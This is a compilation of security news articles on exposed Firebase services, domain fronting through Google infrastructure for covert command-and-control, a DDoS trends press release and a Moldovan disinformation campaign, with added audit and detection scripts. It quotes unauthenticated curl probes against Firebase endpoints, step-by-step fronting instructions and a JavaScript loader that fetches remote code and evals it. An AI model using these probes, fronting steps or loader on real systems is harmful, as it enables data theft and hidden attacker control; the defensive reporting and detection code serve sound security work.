Numerous mobile applications have been found to expose critical user information through misconfigured Firebase services, allowing unauthenticated attackers to access databases, storage buckets, Firestore collections, and Remote Config secrets.
This widespread issue first came to light when security researcher Mike Oude Reimer published findings on 16 September 2025, demonstrating that approximately 150 different Firebase endpoints in top-ranked mobile apps were accessible without any authentication.
These exposures ranged from user credentials and private messages to high-privilege API tokens, underscoring a systemic weakness in how developers configure Firebase security rules.
In the weeks following the initial disclosure, ice0 analysts identified a surge in automated scanning tools exploiting this vulnerability, with attackers harvesting millions of records in bulk.
These tools rely on extracting Firebase project IDs from app APK files or known naming conventions, then probing various service endpoints for open permissions.
Although Firebase warns developers that test-mode configurations expire after 30 days, many teams extend these insecure rules or inadvertently leave production environments in test mode.
The result is an expansive attack surface that miscreants can exploit with minimal effort, jeopardizing both enterprise and consumer data.
The impact extends beyond trivial resources such as public images or non-sensitive flags.
At scale, exposed storage buckets have contained millions of user ID photos, cleartext passwords, and even AWS root access tokens.
In one instance, a storage bucket belonging to an app with over 100 million downloads was discovered hosting user ID photos, allowing attackers to compile vast identity databases.
Similarly, misconfigured Realtime Databases revealed private chat logs and geolocation information, while Remote Config endpoints exposed private API keys for third-party services.
ice0 analysts noted that many of these leaks went unreported or were dismissed as non-issues until full datasets were downloaded and inspected.
The following section explores the infection mechanism leveraged by scanning tools to enumerate and exploit Firebase services, focusing on APK extraction, endpoint discovery, and unauthenticated data retrieval.
Infection Mechanism: APK Analysis and Endpoint Enumeration
Scanning tools like OpenFirebase begin by parsing Android Package Kit (APK) files to extract Firebase project IDs, API keys, and Google App IDs from the compiled res/values/strings.xml and bundled google-services.json.
These identifiers serve as the primary inputs for constructing service URLs. For example, to retrieve a Realtime Database, the scanner issues a simple GET request appending .json to the endpoint:
curl -s https://PROJECT_ID-default-rtdb.firebaseio.com/.json
If the response returns HTTP 200 OK and JSON content, the database is flagged as public. In cases where the database resides in a different region, the initial request returns a JSON error containing the correct regional endpoint, which the tool uses to reissue the request.
This two-step lookup ensures comprehensive coverage without brute-forcing every possible domain variation.
For Remote Config, scanners extract both the google_api_key and google_app_id from strings.xml before constructing a POST request to the Remote Config API (the API key travels in the X-Goog-Api-Key header and the app ID in the JSON body):
curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "X-Goog-Api-Key: GOOGLE_API_KEY" \
  -d '{"appId":"GOOGLE_APP_ID","appInstanceId":"any"}' \
  "https://firebaseremoteconfig.googleapis.com/v1/projects/PROJECT_ID/namespaces/firebase:fetch"
A successful 200 OK response containing configuration data or secrets confirms unauthenticated access to Remote Config entries.
Some configurations include the NOTEMPLATE error when no config exists, allowing scanners to differentiate between protected and empty endpoints.
By automating APK decompilation with tools like JADX and iterating through Firestore collection names—either extracted from code references or guessed via wordlists—attackers can enumerate public Firestore instances.
Github token (Source – ice0)
A query to a non-existent collection returns an empty JSON array rather than an authentication error, signaling vulnerability without prior knowledge of collection names.
This infection mechanism, combining APK metadata extraction with targeted API calls, highlights how minimal information disclosure can lead to full data leakage. Organizations relying on Firebase must enforce strict security rules, audit test-mode expirations, and remove hardcoded keys to prevent these automated attacks.
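The three checks described above (Realtime Database with the regional follow-up, Remote Config, and Firestore collection listing) can be turned into a self-audit that a team runs against its own project IDs before an automated scanner does. The script below is an added example written for this page; it is not OpenFirebase or ice0's code. The exact JSON error wording for a wrong-region database, the NO_TEMPLATE state name, the Firestore REST path, and the sample responses are assumptions, and the HTTP client is injected so the sample runs offline.

```python
import json
import re
from typing import Callable, Dict, Tuple

# Injectable HTTP function: (method, url, headers, body) -> (status, response_text)
Fetch = Callable[[str, str, Dict[str, str], str], Tuple[int, str]]

# Wrong-region error text names the correct regional host (wording assumed).
REGIONAL_HOST = re.compile(r"https://[A-Za-z0-9.-]+\.firebasedatabase\.app")


def classify_rtdb(status: int, body: str) -> Tuple[str, str]:
    """Classify a GET /.json response: 'public', 'protected',
    'redirect' (detail = regional URL to re-query) or 'unknown'."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "unknown", ""
    if status == 200:
        return "public", ""  # readable without credentials
    err = str(data.get("error", "")) if isinstance(data, dict) else ""
    match = REGIONAL_HOST.search(err)
    if match:
        return "redirect", match.group(0)
    if "permission denied" in err.lower():
        return "protected", ""
    return "unknown", err


def classify_remote_config(status: int, body: str) -> str:
    """'public' if a template with entries came back, 'empty' for the
    no-template state, 'protected' when the API refused the request."""
    if status in (401, 403):
        return "protected"
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "unknown"
    if str(data.get("state", "")).replace("_", "").upper() == "NOTEMPLATE":
        return "empty"
    return "public" if status == 200 and data.get("entries") else "unknown"


def classify_firestore(status: int, body: str) -> str:
    """Any 200, even with no documents, means the collection is listable
    without auth; 401/403 means the rules denied the read."""
    if status == 200:
        return "public"
    return "protected" if status in (401, 403) else "unknown"


def audit(project_id: str, app_id: str, api_key: str,
          collections: Tuple[str, ...], fetch: Fetch) -> Dict[str, str]:
    """Run all three checks for one project and return a findings map."""
    findings: Dict[str, str] = {}
    # 1. Realtime Database, following a single regional redirect.
    url = f"https://{project_id}-default-rtdb.firebaseio.com/.json"
    verdict, detail = classify_rtdb(*fetch("GET", url, {}, ""))
    if verdict == "redirect":
        verdict, _ = classify_rtdb(*fetch("GET", detail + "/.json", {}, ""))
    findings["rtdb"] = verdict
    # 2. Remote Config fetch with the app's own key and app ID.
    rc_url = (f"https://firebaseremoteconfig.googleapis.com/v1/projects/"
              f"{project_id}/namespaces/firebase:fetch")
    rc_headers = {"Content-Type": "application/json", "X-Goog-Api-Key": api_key}
    rc_body = json.dumps({"appId": app_id, "appInstanceId": "audit"})
    findings["remote_config"] = classify_remote_config(*fetch("POST", rc_url, rc_headers, rc_body))
    # 3. Firestore: list each known collection through the REST API (path assumed).
    for name in collections:
        fs_url = (f"https://firestore.googleapis.com/v1/projects/{project_id}"
                  f"/databases/(default)/documents/{name}")
        findings[f"firestore:{name}"] = classify_firestore(*fetch("GET", fs_url, {}, ""))
    return findings


# Constructed sample responses for a placeholder project (not a real project).
SAMPLE = {
    "https://demo-app-default-rtdb.firebaseio.com/.json": (404, json.dumps({
        "error": "Database lives in a different region. Please change your database URL "
                 "to https://demo-app-default-rtdb.europe-west1.firebasedatabase.app"})),
    "https://demo-app-default-rtdb.europe-west1.firebasedatabase.app/.json":
        (200, json.dumps({"users": {"u1": {"email": "a@example.com"}}})),
    "https://firebaseremoteconfig.googleapis.com/v1/projects/demo-app/namespaces/firebase:fetch":
        (200, json.dumps({"state": "NO_TEMPLATE"})),
    "https://firestore.googleapis.com/v1/projects/demo-app/databases/(default)/documents/messages":
        (403, json.dumps({"error": {"code": 403, "message": "Missing or insufficient permissions."}})),
    "https://firestore.googleapis.com/v1/projects/demo-app/databases/(default)/documents/public_posts":
        (200, json.dumps({})),
}


def sample_fetch(method: str, url: str, headers: Dict[str, str], body: str) -> Tuple[int, str]:
    """Offline stand-in for an HTTP client, serving the constructed responses."""
    return SAMPLE.get(url, (404, json.dumps({"error": "404 Not Found"})))


def run_sample() -> Dict[str, str]:
    return audit("demo-app", "1:123:android:abc", "AIza-PLACEHOLDER",
                 ("messages", "public_posts"), sample_fetch)


if __name__ == "__main__":
    for check, verdict in run_sample().items():
        print(f"{check:<24} {verdict}")
```

In the constructed sample the database is only reachable after the regional redirect and turns out to be public, Remote Config has no template, and one of the two Firestore collections is listable: the findings map is what a CI job would compare against the expected "protected" everywhere. Swap `sample_fetch` for a real client (for example `urllib.request`) to run it against a project you own.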
Organizations commonly allow traffic to core services like Google Meet, YouTube, Chrome update servers, and Google Cloud Platform (GCP) to ensure uninterrupted operations.
A newly demonstrated domain fronting technique weaponizes this trust to establish covert command-and-control (C2) channels, enabling attackers to tunnel malicious traffic through Google’s own infrastructure without raising suspicion.
Domain Fronting Technique
Praetorian reports that domain fronting exploits the discrepancy between the TLS Server Name Indication (SNI) and the HTTP Host header. In a standard HTTPS handshake, the client presents the SNI in cleartext, for example:
Once the TLS tunnel is established, the HTTP Host header inside the encrypted request can specify an entirely different domain:
By routing through Google’s front-end servers, adversaries can connect to meet.google.com, youtube.com, update.googleapis.com, or even GCP endpoints, while backend routing diverts traffic to attacker-controlled infrastructure hosted on Google Cloud Run or App Engine.
Google[.]com Domain Fronting
To network monitors, the packets appear indistinguishable from legitimate Google usage, blending malicious C2 with normal enterprise traffic.
Researchers created a simple Cloud Run function returning “Hello World!” and inserted its URL in the Host header when connecting to google.com.
Domain Fronting Across Google Services
Unexpectedly, the Cloud Run function was invoked, confirming that the request had been routed to attacker infrastructure rather than Google’s public web servers. This edge-case behavior extends across multiple Google domains, including:
update.googleapis.com
payments.google.com
api.snapchat.com (leveraging Google App Engine)
Because these domains are often excluded from TLS inspection due to certificate pinning or classification as financial or healthcare services, security appliances rarely inspect or block them, granting attackers near-total invisibility.
Historically, major providers blocked domain fronting by enforcing SNI and Host header consistency.
However, Google’s internal load-balancer routing logic still allows mismatches in specific services, creating an unintentional fronting vector. The attack sequence is as follows:
1. Initiate a TLS handshake with SNI set to a high-reputation Google domain (e.g., youtube.com).
2. Within the encrypted request, set the Host header to the C2 domain hosted on Cloud Run or App Engine.
3. Google’s front-end accepts the SNI, terminates TLS, and routes the decrypted HTTP request to backend infrastructure based on the Host header.
4. The attacker’s backend handles the request, enabling bidirectional tunneling through standard HTTPS.
A redirector tool, praetorian-inc/google-redirector, automates setup for red team engagements. Deploying this redirector alongside existing implants allows seamless HTTP-based C2 over Google’s highly trusted channels.
This technique revives the power of domain fronting within Google’s ecosystem, presenting defenders with a formidable challenge: blocking malicious C2 without disrupting essential business services.
Vigilance demands enhanced detection strategies, such as certificate consistency checks, analysis of abnormal traffic patterns, and strict host validation at the enterprise perimeter.
As attackers turn the Internet’s backbone into their covert pipeline, defenders must adapt to identify hidden threats that are hiding in plain sight.
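The "strict host validation" the article recommends only works where a proxy terminates TLS and can see the decrypted Host header beside the SNI it observed; the script below shows what that check looks like over proxy logs. It is an added example written for this page, not Praetorian's redirector or any vendor's detection. The key=value log format, the client addresses and the backend host names are constructed; the Google front domains and the Cloud Run / App Engine suffixes come from the article.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed log format (an assumption): one decrypted request per line as
# key=value pairs, with the SNI seen on the handshake and the Host header inside.
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Fronts named in the article; extend with the Google domains you allow-list.
GOOGLE_FRONTS = ("google.com", "googleapis.com", "youtube.com")
# Backend suffixes the article reports as reachable behind those fronts.
GOOGLE_HOSTED_BACKENDS = (".run.app", ".appspot.com")


@dataclass
class Alert:
    client: str
    sni: str
    host: str
    severity: str


def parse_line(line: str) -> Dict[str, str]:
    return {k: v.strip('"') for k, v in FIELD.findall(line)}


def registrable(name: str) -> str:
    """Last-two-labels reduction; enough for the .com fronts listed above."""
    parts = name.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else name


def check(rec: Dict[str, str]) -> Optional[Alert]:
    """Flag a request whose SNI is a Google front but whose Host header names
    another site. Host must equal SNI exactly (port stripped); a mismatch on a
    front domain is 'medium', and 'high' when Host points at Cloud Run/App Engine."""
    sni = rec.get("sni", "").lower()
    host = rec.get("host", "").lower().rsplit(":", 1)[0]  # drop :port
    if not sni or not host or host == sni:
        return None
    if registrable(sni) not in GOOGLE_FRONTS:
        return None
    severity = "high" if host.endswith(GOOGLE_HOSTED_BACKENDS) else "medium"
    return Alert(rec.get("client", "?"), sni, host, severity)


def scan(lines: List[str]) -> List[Alert]:
    """Run check() over every non-empty log line and keep the alerts."""
    return [a for a in (check(parse_line(ln)) for ln in lines if ln.strip()) if a]


# Constructed sample log: private client addresses and placeholder backend names.
SAMPLE_LOG = """
ts=2025-09-24T10:00:01Z client=10.1.2.3 sni=youtube.com host=youtube.com path=/ status=200
ts=2025-09-24T10:00:02Z client=10.1.2.4 sni=youtube.com host=redirector-demo.a.run.app path=/beacon status=200
ts=2025-09-24T10:00:03Z client=10.1.2.5 sni=update.googleapis.com host=update.googleapis.com:443 path=/service/update2 status=200
ts=2025-09-24T10:00:04Z client=10.1.2.6 sni=www.google.com host=demo-front.appspot.com path=/ status=200
ts=2025-09-24T10:00:05Z client=10.1.2.7 sni=www.google.com host=mail.google.com path=/ status=200
ts=2025-09-24T10:00:06Z client=10.1.2.8 sni=example.org host=example.org path=/ status=200
""".strip().splitlines()


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"[{a.severity}] {a.client} SNI={a.sni} Host={a.host}")
```

The two "high" alerts are the fronting pattern from the article (trusted SNI, Host on a Google-hosted backend). The "medium" alert (Host on a different google.com subdomain than the SNI) is deliberately kept at a lower tier because intra-Google mismatches also occur with legitimate clients; tune that tier against your own baseline before alerting on it.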
Luxembourg, Luxembourg, September 25th, 2025, CyberNewsWire
Gcore, the global edge AI, cloud, network, and security solutions provider, today announced the findings of its Q1-Q2 2025 Radar report into DDoS attack trends. DDoS attacks have reached unprecedented scale and disruption in 2025, and businesses need to act fast to protect themselves from this evolving threat. The report reveals a significant escalation in the total number of DDoS attacks and their magnitude, measured in terabits per second (Tbps).
It also highlights a clear shift: attackers are growing more strategic, blending brute-force volume with precise application-layer manipulation.
Key Insights From Q1-Q2 2025
· Attack volumes increased by 41% compared to Q1-Q2 2024, evidencing the dangerous long-term growth trends predicted in prior Radar reports.
· The largest attack peaked at 2.2 Tbps in Q1-Q2, surpassing the 2 Tbps peak recorded in late 2024.
· DDoS attacks are becoming longer in duration and more harmful.
· Attackers are shifting focus to financial services and tech, with tech overtaking gaming as the most targeted sector.
· DDoS attacks at the application layer have increased by 10% from Q3-Q4 2024 to Q1-Q2 2025.
· The total number of DDoS attacks climbed from 969,000 in H2 2024 to 1.17 million in H1 2025.
Andrey Slastenov, Head of Security at Gcore, commented: “The latest Gcore Radar should be a wake-up call to businesses across all industries. Not only are the number and intensity of attacks increasing, but attackers are expanding the scope of their attacks to reach an increasingly wide range of sectors. Businesses must invest in robust DDoS detection, mitigation, and protection to prevent the financial and reputational impact of an attack.”
Recent Data Shows Shift Toward Longer Sustained Assaults
Attacks shorter than 10 minutes have decreased by about 33%, while those lasting between 10 and 30 minutes have nearly quadrupled. While previous reports highlighted the dominance of very short, intense DDoS attacks, this change indicates that attackers are adapting to the improved automatic detection and mitigation systems employed by companies to handle brief attacks. By extending attack durations, threat actors can circumvent these temporary defense thresholds, cause more extensive damage, and test infrastructure resilience over time.
Multi-vector attacks have also increasingly become a preferred tactic of attackers. By masking malicious activity within seemingly legitimate traffic, attackers complicate detection and extend their window to cause damage. This shift toward more sophisticated attacks underscores the need for an equally layered defense approach that anticipates attacker strategies and protects critical digital assets holistically.
Data Indicates Rise in Attacks on Vulnerable Sectors
Gaming is no longer the dominant target it once was. Its share of total DDoS attacks has dropped significantly (30% in the last year). This notable decline suggests attackers are shifting focus to other sectors such as tech (attacks increased by 15%) and financial services (attacks increased by 15%). These sectors are favored targets because they may be less protected against threat actors and have higher disruption potential.
The Domino Effect of Cyberattacks
Hosting providers, in particular, have become prime targets due to their role supporting SaaS, e-commerce, gaming, and financial clients. An attack on one hosting provider can have dangerous ripple effects: massive service outages and reputation damage to dozens of dependent companies.
Geographical Distribution of DDoS Attacks
With a presence that spans six continents, Gcore can accurately track the geographical sources of DDoS attacks. Gcore derives these insights from the attackers’ IP addresses and the geographic locations of the data centers where malicious traffic is targeted.
Although the United States and the Netherlands remain top sources for attacks (as found in previous Radar reports), Hong Kong is a new source of threats. Hong Kong now accounts for 17% of all network-layer and 10% of application-layer attacks. These findings indicate that attackers are expanding into emerging areas, highlighting the need for proactive and adaptive defenses across diverse regions.
Emerging Origins of Attacks
The rapid increase in application layer attacks (28% to 38% from Q3-Q4 2024 to Q1-Q2 2025) also reveals an overall trend toward multi-layered attacks targeting web application and API vulnerabilities, which particularly impact sectors with a high degree of customer interaction (ranging from e-commerce and online banking to logistics and public services).
Gcore is a global edge AI, cloud, network, and security solutions provider. Headquartered in Luxembourg, with a team of 600 operating from ten offices worldwide, Gcore provides solutions to global leaders in numerous industries. Gcore manages its global IT infrastructure across six continents, with one of the best network performances in Europe, Africa, and LATAM due to the average response time of 30 ms worldwide. Gcore’s network consists of 210 points of presence worldwide in reliable Tier IV and Tier III data centers, with a total network capacity exceeding 200 Tbps.
On the eve of Moldova’s parliamentary elections scheduled for September 28, 2025, cybersecurity researchers have uncovered a sophisticated Russian-backed disinformation campaign designed to undermine public confidence in Moldova’s pro-European leadership.
The campaign began surfacing in April 2025, when analysts first observed a cluster of newly registered domains publishing biased news articles in both Romanian and Russian.
These websites employed identical templates and shared infrastructure with older Russian propaganda outlets, signaling an orchestrated effort to sow discord at a critical juncture in Moldova’s democratic process.
Silent Push analysts identified the campaign through a combination of open-source intelligence and network traffic analysis.
Initial indicators included dozens of URLs hosting political commentary with inflammatory headlines aimed at discrediting the ruling coalition and amplifying calls to pivot back toward Moscow.
Subsequent investigations revealed that these domains resolved to two dedicated IP addresses, both of which had previously hosted content for a 2022 disinformation operation known as Absatz.
By correlating registration metadata and hosting records, researchers established a clear lineage between the new Moldovan targeting effort and earlier campaigns.
Through deep technical analysis, Silent Push analysts noted that the new sites reused several bespoke functions originally developed for the 2022 effort.
These functions handled content generation, automatic comment moderation, and stealthy redirection of social-media referrals.
Reusing this code not only accelerated deployment but also provided a unique fingerprint enabling researchers to connect the disparate sites.
The technical footprint was especially evident in the PHP module responsible for article templating and URL parameter parsing, which contained the following identifiable snippet:
By comparing hash fragments in each URL, analysts could trace the evolution of the codebase across both the 2022 Absatz infrastructure and the 2025 Moldovan campaign.
Detection Evasion and Infrastructure Persistence
The campaign’s operators demonstrated advanced persistence tactics, carefully architecting their infrastructure to evade conventional detection.
Each disinformation website employed a rotating pool of content delivery networks (CDNs) and proxy services to mask origin IPs, falling back to hard-coded backup hosts when a primary node was taken offline.
DNS records were configured with extremely short TTL values—often under five minutes—forcing security teams to constantly refresh caches and complicating takedown efforts.
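The two infrastructure signals above, new domains resolving to the same IP addresses that served the 2022 Absatz operation, and DNS TTLs under five minutes, are the kind of pivot an analyst runs over passive-DNS data. The script below is an added example written for this page, not Silent Push's tooling; the records, domain names (.invalid) and addresses (RFC 5737 test ranges) are constructed to mirror the article's finding, and the 300-second threshold is the article's "under five minutes".

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set


@dataclass(frozen=True)
class DnsRecord:
    domain: str
    ip: str
    ttl: int         # seconds
    first_seen: str  # ISO date


# Constructed passive-DNS style records: two 2022 seed sites and four 2025 domains.
RECORDS = [
    DnsRecord("absatz-mirror-demo.invalid", "192.0.2.10", 3600, "2022-02-01"),
    DnsRecord("absatz-feed-demo.invalid", "192.0.2.11", 3600, "2022-03-14"),
    DnsRecord("md-news-demo.invalid", "192.0.2.10", 120, "2025-04-03"),
    DnsRecord("chisinau-daily-demo.invalid", "192.0.2.10", 60, "2025-04-05"),
    DnsRecord("east-voice-demo.invalid", "192.0.2.11", 300, "2025-04-06"),
    DnsRecord("local-bakery-demo.invalid", "198.51.100.7", 86400, "2025-04-10"),
]
SEED = {"absatz-mirror-demo.invalid", "absatz-feed-demo.invalid"}  # known 2022 sites


def pivot(records: Iterable[DnsRecord], seed: Set[str],
          short_ttl: int = 300) -> Dict[str, List[str]]:
    """Return {domain: [reasons]} for non-seed domains that share a resolving
    IP with a seed domain and/or use a TTL below short_ttl seconds.
    Both reasons together is the strong signal; one alone needs review."""
    records = list(records)
    by_ip: Dict[str, Set[str]] = defaultdict(set)
    for r in records:
        by_ip[r.ip].add(r.domain)
    seed_ips = {r.ip for r in records if r.domain in seed}

    findings: Dict[str, List[str]] = {}
    for r in records:
        if r.domain in seed:
            continue
        reasons = []
        if r.ip in seed_ips:
            linked = ", ".join(sorted(by_ip[r.ip] & seed))
            reasons.append(f"shares {r.ip} with {linked}")
        if r.ttl < short_ttl:
            reasons.append(f"ttl {r.ttl}s below {short_ttl}s")
        if reasons:
            findings[r.domain] = reasons
    return findings


def strong_matches(findings: Dict[str, List[str]]) -> List[str]:
    """Domains that tripped both signals, sorted for stable reporting."""
    return sorted(d for d, why in findings.items() if len(why) >= 2)


if __name__ == "__main__":
    result = pivot(RECORDS, SEED)
    for domain, why in result.items():
        print(domain, "->", "; ".join(why))
    print("strong:", strong_matches(result))
```

Shared hosting with a known operation is the stronger of the two signals (shared CDN or bulletproof-hosting addresses produce false positives, so check that the IP is dedicated, as the article says these were), while a short TTL on its own is common for legitimate CDN-fronted sites; that is why the example reports the reasons rather than a single verdict.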
In one instance, when researchers successfully blocked access to a malicious domain at the ISP level, the site automatically redirected visitors to an alternate domain using a stealth JavaScript loader:
<script>
fetch('https://cdn.cloudproxy[.]net/get?siteId=42')
  .then(res => res.text())
  .then(code => eval(code));
</script>
This loader fetched an obfuscated payload from a third-party CDN, which in turn rehydrated the disinformation site content in the user’s browser without touching the original domain.
By leveraging this dual-stage loading mechanism, the campaign could survive domain blacklisting and continue publishing articles without significant downtime.
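A loader of this shape (a fetch() whose promise chain ends in eval()) is easy to spot statically in crawled page content, which is useful when hunting for mirror sites that survived a block. The script below is an added example written for this page, not the campaign's code or Silent Push's detection; the sample HTML, its benign data fetch and the placeholder CDN host are constructed, and the article's real indicator is not used.

```python
import re
from typing import List, NamedTuple
from urllib.parse import urlparse

SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
FETCH_URL = re.compile(r"""fetch\(\s*['"](https?://[^'"]+)['"]""")
# Sinks that turn fetched text into executable code in the browser.
CODE_SINKS = re.compile(r"\beval\s*\(|new\s+Function\s*\(")


class Finding(NamedTuple):
    url: str
    host: str
    cross_origin: bool


def find_remote_eval(html: str, page_host: str) -> List[Finding]:
    """Report fetch() calls whose chained statement feeds a code sink, i.e.
    remote code rehydrated in the browser as in the article's loader."""
    out: List[Finding] = []
    for script in SCRIPT.findall(html):
        for m in FETCH_URL.finditer(script):
            # Inspect only the chained statement: up to the next ';' (or end of script).
            end = script.find(";", m.end())
            tail = script[m.end(): end if end != -1 else len(script)]
            if CODE_SINKS.search(tail):
                host = urlparse(m.group(1)).hostname or ""
                out.append(Finding(m.group(1), host, host != page_host))
    return out


# Constructed page: one benign JSON fetch and one eval-based loader from a placeholder CDN.
SAMPLE_HTML = """
<html><body>
<script>
fetch('https://api.news-demo.invalid/latest').then(r => r.json()).then(d => render(d));
</script>
<script>
fetch('https://cdn-proxy-demo.invalid/get?siteId=42')
  .then(res => res.text())
  .then(code => eval(code));
</script>
</body></html>
"""


if __name__ == "__main__":
    for f in find_remote_eval(SAMPLE_HTML, "news-demo.invalid"):
        scope = "cross-origin" if f.cross_origin else "same-origin"
        print(f"{scope} remote eval from {f.url}")
```

The cross-origin flag matters for triage: a site pulling code from its own origin is ordinary, while a page whose content comes from eval() of text fetched from another host is the dual-stage pattern described above, and the fetched host is the next pivot point for the infrastructure analysis.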
To maintain operational security, all command-and-control interactions for new content updates were conducted over TLS-encrypted channels using non-standard ports.
The same ports had been observed in the 2022 Absatz campaign, further cementing the link between the two efforts.
Analysts also noted that social-media amplification relied on low-quality bot accounts programmed to mimic genuine user behavior by varying posting times and interleaving political content with neutral topics like sports or local weather.
As Moldova approaches the polls, this campaign underscores the importance of technical collaboration and real-time monitoring to defend democratic institutions from covert influence operations.
Silent Push continues to track and mitigate the evolving infrastructure behind the Storm-1679 network, with detailed telemetry available to enterprise customers for proactive defense measures.